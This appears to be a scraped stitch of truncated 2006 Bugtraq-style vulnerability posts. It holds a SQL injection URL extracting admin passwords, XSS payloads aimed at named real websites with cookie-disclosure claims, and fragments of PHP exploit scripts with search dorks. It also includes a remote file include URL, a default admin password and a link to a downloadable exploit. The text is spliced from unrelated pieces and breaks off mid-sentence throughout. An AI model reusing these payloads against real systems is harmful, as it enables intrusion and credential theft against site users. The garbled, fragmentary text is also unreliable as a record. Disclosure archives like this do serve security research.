http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
credits: EntriKa & The_BeKiR & erne
yes the journal is exploitable as well
there seem to be no filters on the journal title so you can simply put:
">alert('XSS')
also the other places where you can update your journal etc. don't filter
anything
proof:
http://vampirefreaks.com/journal.php?u=NanoyMaster
webcrawler.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://ww
Palm.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.majo
With Opera 8.54 on Windows XP (all patches) this does increase CPU to
100% utilization. However, the system is still very usable (I opened
Thunderbird to write this while it was open) and simply closing the tab
simply closed the page and CPU utilization returned to idle.
Nathaniel Hasenfus
Ratemylook.co.uk
Homepage:
http://www.ratemylook.co.uk
Affected files:
user.php4
top.php4
hot.php4
toponline.php4
user.php4 XSS vuln with cookie disclosure:
http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own";>">">'>http://yo
About.com
Homepage:
http://www.about.com
Affected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
---
Search input box xss vuln with cookie disclosure:
Works by putting the tags in the input box,
Macworld.com - XSS vulnerability
--
Type: Cross site scripting
Rated as: Low Risk
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vie
Ratescene.co.uk
Homepage:
http://www.ratescene.co.uk
Affected files:
input boxes of editing your profile
Profile input boxes XSS vuln with cookie disclosure:
Data isn't sanitized, try entering the code below:
Screenshots:
http://www.
Windowsitpro.com
Homepage:
http://www.windowsitpro.com
Affected files:
Search input box
Downloading whitepapers
Search input box xss vuln with cookie disclosure:
We convert our javascript to hex format so we don't receive the default "Your
request cannot be processed as this time" error
The phpatm support forum (currently down) advises administrators to put a
.htaccess into the users directory with the following content:
# no one gets in here!
order allow,deny
deny from all
Furthermore the website recommends to rename the "users" directory and change
the corresponding va
example:
http://www.animesuki.com/doc.php/%3Cscript%3Ealert('hi')%3C/script%3E/
hints:
Cookiestealer, redirect people, something, general fun
Facerave.com
Homepage:
http://www.facerave.com
Affected files:
* Profile input boxes
- Self Description box
* Posting a blog entry
* Sending a message
index.php
--
XSS vuln with cookie disclosure via posting a comment:
No filte
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = "$root_url/library/editor/";
$abs_path_editor = "$root/library/editor/";
?>
Proof Of Concept
http://www.site.com/[dcpath]/library/editor/
514.es brings to you the proof of concept for mybb 1.1.2
http://secunia.com/secunia_research/2006-40/advisory/
GET it here: http://www.514.es/download/mybibi.pl
Best regards,
- J
Hotscripts.com
Homepage:
http://www.hotscripts.com
Affected files:
search input box
adding a review
Editing your profile
sending an author a message.
Creating a new listing
XSS vuln with cookie disclosure in search input box:
For a PoC try p
Vendor : www.roostercode.com
version : all version!
BUG :
You can include all html tag ... in chat line !
for example : alert("HI users!")
+
ISO.org - XSS vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.major
If you change:
to:
it will also crash IE 6.x. Don't know about 7 Beta.
-cdh
- Original Message -
From: "Greg Merideth (Forward Technology)" <[EMAIL PROTECTED]>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: [EMAIL PROTECTED], bugtraq@securityf
On Sat, 10 Jun 2006, [EMAIL PROTECTED] wrote:
> The current password is not necessary for a successful password change for
> members of gameplay.co.uk which makes changing passwords through scripts as
> easy as tying your shoe lace.
> (https://shop.gameplay.co.uk/gameplay/changepassword.asp)
>
hi5.com
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows a lot of html tags to be used on their site but they
will filter out words like javascript, applet, and iframe tags (which is to be
expected
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello Michal,
On Thu, Jun 08, 2006 at 10:48:18PM +0200, Michal Zalewski wrote:
[...]
> Commercial SSL VPNs are a fairly recent technology that has a
> considerable appeal to various corporations. Because of its novelty,
> however, in a typical setup
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Affected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
--
XSS vuln via input boxes in profile:
Apnaspace.com (A myspace type site for arab & indian teens)
Homepage:
http://www.http://www.apnaspace.com
Affected files:
* Comment input box:
* Posting a blog entry:
- Entry title
- Entry body
* Viewing a profile
* Posting a bulletin.
* Commenting on a picture
* Sending mail to
use the searchbox with
">alert('XSS')
eg url:
http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
Cline Communications Sql injection
-
Site:http://www.celerondude.com/
Demo:http://www.liveelite.com/
-
Sql injection
1,photo_enlarged.php file Photo_ID parameter
2,newsdetail.php file NID parameter
3,staff_photo_enlarged
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "this is called the Sun-Tzu 'trascendental guru meditation'
tecnique\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
Hi
Yes, there must be the XSS heaven :)
I contacted the INCROWD Interactive Media first time in March this year and
they always said, that they will patch it. Unfortunately they didn't do
anything until now and I didn't believe that they will do before someone do
a real nasty hack (using for
Dealgates.com
Homepage:
http://www.dealgates.com
Affected files:
*Input boxes when registering new account
* Search box
-
XSS vuln with cookie disclosure when registering a new account.
To bypass the adding backslashes to ; and ", we use the long U
Housecarers.com
Homepage:
http://housecarers.com
Affected files:
* Posting a Housesit:
- City/Town box
- County/District box
- Suburb box
- City/Town Area box
* Searching for housesitters
* Sending messages to house sitters.
* Viewing member profiles
---
On Fri, 16 Jun 2006, Darren Reed wrote:
From my own mail archives, PHP appears to make up at least 4% of the
email to bugtraq I see - or over 1000 issues since 1995, out of the
25,000 I have saved.
People complain about applications like sendmail...in the same period,
it has been responsible
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by bitweaver\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to bitweaver\r\n";
ec
Darren Reed said:
> From my own mail archives, PHP appears to make up at least 4% of the
> email to bugtraq I see - or over 1000 issues since 1995, out of the
> 25,000 I have saved.
Do you mean the PHP interpreter? Or applications written in PHP?
I'm not sure how many vulnerabilities were i
On 6/16/06, Darren Reed <[EMAIL PROTECTED]> wrote:
From my own mail archives, PHP appears to make up at least 4%
of the email to bugtraq I see - or over 1000 issues since 1995,
out of the 25,000 I have saved.
People complain about applications like sendmail...in the same
period, it has been res
GreatDomains.com - XSS with cookie disclosure
--
Type: Cross site scripting
Date: June, 16th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
webcrawler.com - Cross site scripting vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieir
Netscape.com - Cross site scripting vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-
Simple PHP Poll
http://www.cgixp.tk/
DESCRIPTION:
google dork = "Poewred By: Simple PHP Poll" and "Powered By: Simple PHP Poll"
administrator login path /poll_admin.php login to default admin pass
"administrator" or add to ;
?action=edit&filename=question.txt(questions p
Multiple file include exploits in dotwidgeta Version 2
script type : dotwidgeta Version 2
bug found by : sweet-devil
team : site-down
type : file include
exploits :
index.php
http://www.example.com/path/index.php?file_path=http://yoursite/r
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
This is Cisco PSIRT response to the statements made by Thomas
Liam Romanis of Fujitsu Services Limited in their posting to BugTraq on
the 15th June 2006, regarding Cisco Secure ACS LoginProxy.CGI Cross-Site
Scripting Vulnerability, locat